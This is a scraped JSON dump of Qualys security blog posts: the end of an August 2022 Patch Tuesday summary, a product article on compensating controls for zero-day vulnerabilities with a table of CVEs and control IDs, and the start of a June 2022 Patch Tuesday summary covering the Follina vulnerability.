This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities that could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-42](<https://helpx.adobe.com/security/products/framemaker/apsb22-42.html>) | Security update available for Adobe FrameMaker\n\nThis update resolves six (6) vulnerabilities:\n\n * Five (5) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * One (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe FrameMaker. This update addresses multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-43](<https://helpx.adobe.com/security/products/premiere_elements/apsb22-43.html>) | Security update available for Adobe Premiere Elements\n\nThis update resolves one (1) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Premiere Elements. This update addresses one [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability. Successful exploitation could lead to arbitrary code execution. 
\n\n* * *\n\n# **About Qualys Patch Tuesday**\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n## Qualys [Threat Protection](<https://www.qualys.com/apps/threat-protection/>) High-Rated Advisories for August 1-9, 2022 _New Content_\n\n * [Microsoft Patches 121 Vulnerabilities with Two Zero-days and 17 Critical; Plus 20 Microsoft Edge (Chromium-Based) in August 2022 Patch Tuesday](<https://threatprotect.qualys.com/2022/08/10/microsoft-patches-121-vulnerabilities-with-two-zero-days-and-17-critical-plus-20-microsoft-edge-chromium-based-in-august-2022-patch-tuesday/>)\n * [VMware vRealize Operations Multiple Vulnerabilities Patched in the Latest Security update (CVE-2022-31672, CVE-2022-31673, CVE-2022-31674, & CVE-2022-31675)](<https://threatprotect.qualys.com/2022/08/10/vmware-vrealize-operations-multiple-vulnerabilities-patched-in-the-latest-security-update-cve-2022-31672-cve-2022-31673-cve-2022-31674-cve-2022-31675/>)\n * [Cisco Patched Small Business RV Series Routers Multiple Vulnerabilities (CVE-2022-20827, CVE-2022-20841, and CVE-2022-20842)](<https://threatprotect.qualys.com/2022/08/04/cisco-patched-small-business-rv-series-routers-multiple-vulnerabilities-cve-2022-20827-cve-2022-20841-and-cve-2022-20842/>)\n * [VMware Patched Multiple Vulnerabilities in VMware Products including Identity Manager (vIDM) and Workspace ONE Access](<https://threatprotect.qualys.com/2022/08/03/vmware-patched-multiple-vulnerabilities-in-vmware-products-including-identity-manager-vidm-and-workspace-one-access/>)\n * [Atlassian Confluence Server and Confluence Data Center \u2013 Questions for Confluence 
App \u2013 Hardcoded Password Vulnerability (CVE-2022-26138)](<https://threatprotect.qualys.com/2022/08/01/atlassian-confluence-server-and-confluence-data-center-questions-for-confluence-app-hardcoded-password-vulnerability-cve-2022-26138/>)\n\n* * *\n\n## Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all of your hosts impacted by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`50121` OR qid:`91929` OR qid:`91931` OR qid:`91932` OR qid:`91933` OR qid:`91934` OR qid:`91935` OR qid:`91936` OR qid:`110413` OR qid:`110414` OR qid:`376813` ) \n\n\n\n [A Deep Dive into VMDR 2.0 with Qualys TruRisk\u2122](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>) _The old way of ranking vulnerabilities doesn\u2019t work anymore. Instead, enterprise security teams need to rate the true risks to their business. In this blog, we examine each of the risk scores delivered by Qualys TruRisk, the criteria used to compute them, and how they can be used to prioritize remediation._\n\n* * *\n\n## Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`50121` OR qid:`91929` OR qid:`91931` OR qid:`91932` OR qid:`91933` OR qid:`91934` OR qid:`91935` OR qid:`91936` OR qid:`110413` OR qid:`110414` OR qid:`376813` ) \n\n\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n## Evaluate Vendor-Suggested Workarounds with [Policy Compliance](<https://www.qualys.com/forms/policy-compliance/>) _New Content_\n\nQualys\u2019 [Policy Compliance Control Library](<https://vimeo.com/700790353>) makes it easy to evaluate your technology infrastructure when the current situation requires the implementation of a vendor-suggested workaround. A workaround is a method, sometimes used temporarily, for achieving a task or goal when the usual or planned method isn't working. Information technology often uses a workaround to overcome hardware, programming, or communication problems. Once a problem is fixed, a workaround is usually abandoned. 
_ [Source](<https://www.techtarget.com/whatis/definition/workaround>)_\n\nThe following Qualys [Policy Compliance Control IDs (CIDs) and System Defined Controls (SDC)](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/module_pc/controls/controls_lp.htm>) have been updated to support the Microsoft-recommended workarounds for this Patch Tuesday:\n\n#### **[CVE-2022-35793](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35793>) | Windows Print Spooler Elevation of Privilege (EoP) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 7.3/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 1368: Status of the \u2018Print Spooler\u2019 service\n * 21711: Status of the \u2018Allow Print Spooler to accept client connections\u2019 group policy setting \n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation More Likely\n\n* * *\n\n#### **[CVE-2022-35804](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35804>) | SMB Client and Server Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 24476: Status of the SMBv3 Client compressions setting\n * 20233: Status of the SMBv3 Server compressions setting \n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation More Likely\n\n* * *\n\n#### **[CVE-2022-35755](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35755>) | Windows Print Spooler Elevation of Privilege (EoP) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 7.3/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 1368: Status of the \u2018Print Spooler\u2019 service\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation More Likely\n\n* * *\n\n#### 
**[CVE-2022-30133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30133>), [CVE-2022-35744](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35744>) | Windows Point-to-Point Protocol (PPP) Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 11220: List of \u2018Inbound Rules\u2019 configured in Windows Firewall with Advanced Security via GPO\n * 14028: List of \u2018Outbound Rules\u2019 configured in Windows Firewall with Advanced Security via GPO\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation Less Likely\n\n* * *\n\n#### **[CVE-2022-34715](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715>) | Windows Network File System Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 24139: Status of the Windows Network File System (NFSV4) service\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation Less Likely\n\n* * *\n\n#### **[CVE-2022-34691](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34691>) | Active Directory Domain Services Elevation of Privilege (EoP) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 4079: Status of the \u2018Active Directory Certificate Service\u2019\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation Less Likely\n\n* * *\n\nThe following QQL will return a posture assessment for the CIDs for this Patch Tuesday:\n \n \n control:( id:`1368` OR id:`4079` OR id:`11220` OR id:`14028` OR id:`20233` OR id:`21711` OR id:`24139` OR id:`24476` ) \n\n\n\n [Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating 
Controls](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/23/mitigating-the-risk-of-zero-day-vulnerabilities-by-using-compensating-controls>)\n\n [Policy Compliance (PC) | Policy Library Update Blogs](<https://notifications.qualys.com/tag/policy-library>)\n\n* * *\n\n##### Patch Tuesday is Complete.\n\n* * *\n\n# Qualys Monthly Webinar Series \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. 
\n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities & Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-09T20:00:00", "type": "qualysblog", "title": "August 2022 Patch Tuesday | Microsoft Releases 121 Vulnerabilities with 17 Critical, plus 20 Microsoft Edge (Chromium-Based); Adobe Releases 5 Advisories, 25 Vulnerabilities with 15 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20827", "CVE-2022-20841", "CVE-2022-20842", "CVE-2022-22047", "CVE-2022-2294", "CVE-2022-26138", "CVE-2022-30133", "CVE-2022-30134", "CVE-2022-30190", "CVE-2022-31672", "CVE-2022-31673", "CVE-2022-31674", "CVE-2022-31675", "CVE-2022-33636", "CVE-2022-33646", "CVE-2022-33649", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34691", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-35744", "CVE-2022-35755", "CVE-2022-35766", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35796", "CVE-2022-35804"], "modified": "2022-08-09T20:00:00", "id": 
"QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-23T18:02:10", "description": "_Zero-day vulnerability attacks have emerged as a major cybersecurity threat in the last few years. Organizations most often targeted include large enterprises and government/Federal agencies. However, any organization, regardless of its size, business, or industry, is a potential target for zero-day threats._\n\nMost notably, already publicly disclosed. This means that **one out of every four** zero-day exploits detected could potentially have been avoided if a more thorough investigation and patching effort had been pursued. In 2021, around 58 zero-day vulnerabilities were reported, more than double the total for the previous year. This is a definite cause for alarm. As of June 2022, Google\u2019s project had identified 18 zero-day vulnerabilities so far this year. 
\n\n\n\nHere are some well-known examples of zero-day attacks:\n\n * Most recently, the [Follina zero-day vulnerability](<https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-edr-context-xdr>)\n * [Log4j](<https://www.qualys.com/log4shell-cve-2021-44228/>) (2021)\n * Chrome (2021)\n * [Zoom](<https://blog.qualys.com/qualys-insights/2020/04/06/secure-remote-endpoints-from-vulnerabilities-in-video-conferencing-productivity-applications-like-zoom>) (2020)\n * [Apple iOS](<https://blog.qualys.com/vulnerabilities-threat-research/2021/10/18/apple-fixes-zero-day-in-ios-and-ipados-15-0-2-emergency-release-detect-and-prioritize-vulnerabilities-using-vmdr-for-mobile-devices>) (2020)\n * Microsoft Windows, Eastern Europe (2019)\n\n### Why Are Zero-Day Attacks/Exploits so Dangerous?\n\nThe biggest challenge in cybersecurity remains **to secure what can\u2019t be seen.**\n\nZero-day attacks occur without warning, which makes them difficult to protect against. They take advantage of previously unknown vulnerabilities that have yet to be patched. In some cases, the software vendor is not even aware that the weakness exists. \n\nThe time between initial disclosure of a new vulnerability and its exploitation is shrinking. Yet the time to fix a vulnerability is not shrinking at the same rate. This gives attackers ample time to run rampant and launch zero-day attacks on defenseless targets. Unfortunately, it can still take days, weeks, or even months for fixes to be released. 
An enterprise may be forced to use the vulnerable/compromised software that entire time, exposing both its mission-critical machines and sensitive data.\n\nEven worse, once a zero-day patch is released, not all organizations are quick to implement it.\n\n### How Qualys Policy Compliance Helps Combat Zero-Day Threats\n\n[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) is a next-generation solution for continuous cyber risk reduction and effective compliance with internal policies, industry mandates, and government regulations. It helps enterprises of any size to respond to zero-day threats. Here\u2019s how:\n\n#### Detecting New Vulnerabilities\n\nThe Qualys Research Team analyzes zero-day vulnerabilities published from various sources (e.g. [Microsoft Patch Tuesday](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/09/august-2022-patch-tuesday>)), including vendor advisories, to accurately detect these vulnerabilities. They identify workarounds and create compensatory controls accordingly, which help to detect these vulnerabilities in the IT environment.\n\n#### Mitigating Risk with Compensating Controls\n\nQualys Policy Compliance (PC) has a rich library of security controls that can be used to compensate for various zero-day vulnerabilities across different technologies and platforms. 
Qualys continuously releases new compensatory controls for new zero-day vulnerabilities as soon as a vulnerability is disclosed for which no patch is yet available.\n\nWhile no organization can completely protect itself from a zero-day attack, organizations are able to detect new zero-day vulnerabilities and mitigate the risk associated with them with Qualys PC compensatory controls.\n\nHere is a current list of zero-day vulnerabilities for which Qualys PC has compensatory controls.\n\n#### Zero-day Vulnerabilities, 2020-2022\n\nHere is a listing of zero-day threats disclosed over the past three years, with links to Qualys blogs analyzing the CVEs (where applicable).\n\n**CVE ID**| **Vulnerability name**| **Control ID**| **Control Title** \n---|---|---|--- \nCVE-2022-30190 | Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190) AKA [\u201cFollina\u201d](<https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-edr-context-xdr>) | 24074| Status of the 'Microsoft Support Diagnostic Tool (MSDT)' service \nCVE-2022-20695| Cisco Wireless LAN Controller Management Interface Authentication Bypass Vulnerability| 23670| Status of mac filter compatibility mode \nCVE-2022-22965| [Spring framework](<https://blog.qualys.com/vulnerabilities-threat-research/2022/03/31/spring-framework-zero-day-remote-code-execution-spring4shell-vulnerability>) RCE| 23425| List of Java versions and processes present on the host \nCVE-2021-4034| [PwnKit: Local Privilege Escalation Vulnerability](<https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034>)| 22844| Status of the SUID bit for /usr/bin/pkexec \nCVE-2021-4104 \nCVE-2021-44228 \nCVE-2021-45046 \nCVE-2021-45105| [Log4j Remote Code Execution 
(RCE)](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell>)| 22639| Detection of the Apache Log4j Remote Code Execution (RCE) vulnerability (Log4Shell) (Linux) \nCVE-2021-4104 \nCVE-2021-44228 \nCVE-2021-45046 \nCVE-2021-45105| [Log4j Remote Code Execution (RCE)](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell>)| 22638| Detection of the Apache Log4j Remote Code Execution (RCE) vulnerability (Log4Shell) (Windows) \nCVE-2021-34527| [Windows Print Spooler Remote Code Execution Vulnerability](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/07/microsoft-windows-print-spooler-rce-vulnerability-printnightmare-cve-2021-34527-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| 21711| Status of the 'Allow Print Spooler to accept client connections' group policy setting \nCVE-2021-34527| | 19071| Status of the 'Point and Print Restrictions: When updating drivers for an existing connection' setting \nCVE-2021-34527| | 19070| Status of the 'Point and Print Restrictions: When installing drivers for a new connection' setting \nCVE-2021-34527| | 1368| Status of the 'Print Spooler' service \nCVE-2020-10148| [SolarWinds Orion API Authentication Bypass Vulnerability](<https://blog.qualys.com/vulnerabilities-threat-research/2021/01/04/technical-deep-dive-into-solarwinds-breach>)| 20645| Status of 'match-url' for rewrite rule 'PassValidSkipi18nRequest' where 'type' is None (Site-Level) \nCVE-2020-10148| | 20644| Status of 'match-url' for rewrite rule 'PassValidi18nRequest' where 'type' is None (Site-Level) \nCVE-2020-10148| | 20643| Status of 'match-url' parameter for rewrite rule 'BLockOtherSkipi18nRequest' where 'statuscode' is 403 (Site-Level) \nCVE-2020-10148| | 20642| Status of 'match-url' parameter for rewrite rule 'BLockOtheri18nRequest' where 'statuscode' is 403 (Site-Level) \nCVE-2020-10148| | 
20641| Status of 'match-url' parameter for rewrite rule 'BLockInvalidAxdRequest' where 'statuscode' is 403 (Site-Level) \nCVE-2020-11993| Apache HTTPD Server HTTP/2 module memory crash| 19188| The Status of the 'LogLevel' directive in the Apache configuration file (Server Level) \nCVE-2020-9490| Apache HTTPD Server HTTP/2 push crash| 19187| Status of the 'H2Push' directive in the apache configuration file (Server Level) \nCVE-2020-16898| [Windows TCP/IP Remote Code Execution Vulnerability](<https://blog.qualys.com/product-tech/2020/10/14/microsoft-windows-tcp-ip-remote-code-execution-vulnerability-cve-2020-16898-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| 19571| Status of the 'RA Based DNS Config (RFC 6106)' parameter of network interface (Qualys Agent only) \nCVE-2020-1350| [KB4569509: DNS Server Vulnerability](<https://blog.qualys.com/vulnerabilities-threat-research/2020/07/20/automatically-discover-prioritize-and-remediate-windows-dns-vulnerability-cve-2020-1350-using-qualys-vmdr>)| 18935| Status of the 'TcpReceivePacketSize' parameter within the 'HKLM\\System\\CurrentControlSet\\Services\\DNS\\Parameters' registry key \n \n#### Identifying Compensatory Controls\n\nUsing Qualys Policy Compliance\u2019s new user interface, users can verify the compliance posture of these controls simply by looking up the CVE ID, the vulnerability's unique identifier. 
As demonstrated below, it is easy to search for them using the QQL token **control.vulnerability.cveId:** and then to create a dashboard from the results.\n\nIdentifying the compensatory controls using the CVE ID\n\n### Benefit of Qualys Policy Compliance for Zero-Day Threats\n\nThe main benefit of Qualys Policy Compliance is \u201cDefense in Depth\u201d.\n\nEnterprises can make their security architecture stronger by assessing and fixing any misconfigurations, and then deploying patches easily once they are available, to reduce the organization\u2019s overall cyber risk.\n\nThe initial assessment gives cybersecurity teams insight into their current security posture. It plays an important role in mitigating the risk posed by zero-day vulnerabilities while the IT environment is vulnerable and until a vendor patch is released. In addition, organizations can add one more layer of security to their environment by leveraging Qualys PC controls to identify misconfigurations and provide the solution to mitigate them. Qualys researchers work around the clock analyzing zero-day vulnerabilities and release configuration assessment controls to detect and mitigate publicly known zero-day vulnerabilities.\n\n#### Remediate Misconfigurations using Qualys Policy Compliance AutoRemediation\n\nQualys Policy Compliance doesn\u2019t just detect misconfigurations associated with zero-day vulnerabilities, but also remediates them at scale using its AutoRemediation feature. 
After fixing the misconfiguration with AutoRemediation, users have reduced the overall risk posed by any particular vulnerability.\n\nLet\u2019s examine a specific example, using the recently disclosed [zero-day vulnerability commonly known as Follina](<https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-edr-context-xdr>).\n\nSecurity posture of compensating controls for Follina vulnerability\n\nWith misconfigurations associated with Follina, the risk is high:\n\nCyber risk from Follina is high\u2026 without a fix\n\nThe control has failed. The following series of screenshots shows how users can remediate the control using Qualys PC Auto-Remediation:\n\nStep 1: Assess the misconfigured control\nStep 2: Choose to remediate the failure\nStep 3: Name the remediation job\nStep 4: Select the control\nStep 5: Go to the script library\n\nNext, users can select a remediation script:\n\nStep 6: Select the remediation script from the library\n\nThen they select the asset for remediation:\n\nStep 7: Select assets to remediate\nStep 8: Track status of the remediation job\n\nAfter successful execution of the remediation script, the control is remediated, and the security posture changes from Fail to Pass.\n\nCyber risk has been reduced after fixing the misconfiguration.\n\nRemediation reduces Applied Risk Score\n\n#### Executing Workarounds using Qualys Custom Assessment and Remediation\n\n[Qualys Custom Assessment and Remediation](<https://www.qualys.com/apps/custom-assessment-remediation/>) allows security practitioners to quickly create and execute custom scripts and controls, and then to take immediate action to directly remediate problems and apply mitigations. 
From Qualys PC, users can perform the provided mitigation steps by creating a PowerShell script and executing it on the vulnerable assets.\n\nWatch this short looping video demonstrating how easy it is to execute remediation jobs in Qualys.\n\nApplying workaround for Follina vulnerability using Qualys Custom Assessment & Remediation\n\n### Summary\n\nQualys Policy Compliance is not only a leading provider of security recommendations across CIS and DISA standards, but also provides out-of-the-box recommendations and compensating controls. This combination secures enterprise IT infrastructure from known zero-day vulnerabilities when no patch is available, thereby reducing the overall cyber risk associated with any zero-day vulnerability.\n\n### Getting Started\n\nReady to get started? Learn more about how Qualys Policy Compliance provides different configuration assessment controls. [Sign up for a free trial today.](<https://www.qualys.com/forms/policy-compliance/>)\n\n### Contributors\n\n * Mukesh Choudhary, Compliance Research Analyst, Qualys\n * Mohd Anas Khan, Compliance Research Analyst, Qualys\n * Vikas Gothwal, Senior Compliance Research Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-23T10:46:04", "type": "qualysblog", "title": "Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10148", "CVE-2020-11993", "CVE-2020-1350", "CVE-2020-16898", "CVE-2020-9490", "CVE-2021-34527", "CVE-2021-4034", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-20695", "CVE-2022-22965", "CVE-2022-30190"], "modified": "2022-08-23T10:46:04", "id": "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-24T21:57:29", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 55 vulnerabilities (aka flaws) in the June 2022 update, including three (3) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE). This month's Patch Tuesday cumulative Windows update includes the fix for one (1) zero-day vulnerability ([CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)). 
Microsoft also released an advisory for Intel Processor MMIO Stale Data Vulnerabilities to address four (4) Intel vulnerabilities ([Microsoft Advisory 220002](<https://msrc.microsoft.com/update-guide/vulnerability/ADV220002>), [Intel-SA-00615](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html>)).\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege, Information Disclosure, Remote Code Execution (RCE), Security Feature Bypass, and Spoofing vulnerabilities.\n\nMany of the vulnerabilities patched this month relate to remote code execution, but there are no reports of active exploitation in the wild with the exception of an update to [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>), a Microsoft Windows Support Diagnostic Tool (MSDT) vulnerability made public in May.\n\n### The June 2022 Microsoft vulnerabilities are classified as follows: \n\n\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/06/15/microsoft-patches-55-vulnerabilities-including-one-zero-day-and-three-critical-in-the-june-2022-patch-tuesday/>)\n\n* * *\n\n# **Notable Microsoft Vulnerabilities Patched**\n\n### [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) | Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nMicrosoft has fixed the widely-exploited _**Windows Follina MSDT zero-day**_ vulnerability tracked as [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) in the June 2022 Updates.\n\nThe update for this vulnerability is in the June 2022 cumulative Windows Updates. Microsoft strongly recommends that customers install the updates to be fully protected from the vulnerability. 
Customers whose systems are configured to receive automatic updates do not need to take any further action.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected._**\n\nOn May 31st Qualys released **QID 91909 Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (RCE) Vulnerability (Follina) (Zero Day)**. \n \nOn June 14th, Microsoft released the patch for this vulnerability in the June 2022 cumulative Windows Updates. \n \nQualys will modify our existing detection signature to check for the PATCH ONLY and apply a minor title revision to remove the zero-day reference:** QID 91909 Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (RCE) Vulnerability (Follina).** \n \nQualys will also release a NEW Information Gathered (IG) detection that will test for the MITIGATION ONLY: **QID 45538 Microsoft Support Diagnostic Tool (MSDT) URL Protocol Vulnerability Disabled (Follina Mitigation Enabled).** \n \nThese updates will be included in the June 14th evening\u2019s Patch Tuesday release cycle. 
\n_(VULNSIGS-2.5.504-4, QAGENT-SIGNATURE-SET-2.5.504.4-3, LX_MANIFEST-2.5.504.4-4)_ \n--- \n \n\n\n _Examine a potential attack vector as well as technical details of Follina, and chart the ability to detect this new vulnerability using both Qualys Multi-Vector EDR and Qualys Context XDR._ [Detect the Follina MSDT Vulnerability (CVE-2022-30190) with Qualys Multi-Vector EDR & Context XDR](<https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-edr-context-xdr>)\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/05/31/microsoft-windows-support-diagnostic-tool-msdt-remote-code-execution-vulnerability-cve-2022-30190/>)\n\n* * *\n\n### Microsoft Guidance on Intel [Processor MMIO Stale Data Vulnerabilities](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html>)\n\n#### [Microsoft Advisory 220002](<https://msrc.microsoft.com/update-guide/vulnerability/ADV220002>), [Intel-SA-00615](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html>)\n\nOn June 14, 2022, Intel published information about a class of memory-mapped I/O vulnerabilities known as [Processor MMIO Stale Data Vulnerabilities](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html>).\n\nAn attacker who successfully exploited these vulnerabilities might be able to read privileged data across trust boundaries. In shared resource environments (such as exists in some cloud services configurations), these vulnerabilities could allow one virtual machine to improperly access information from another. 
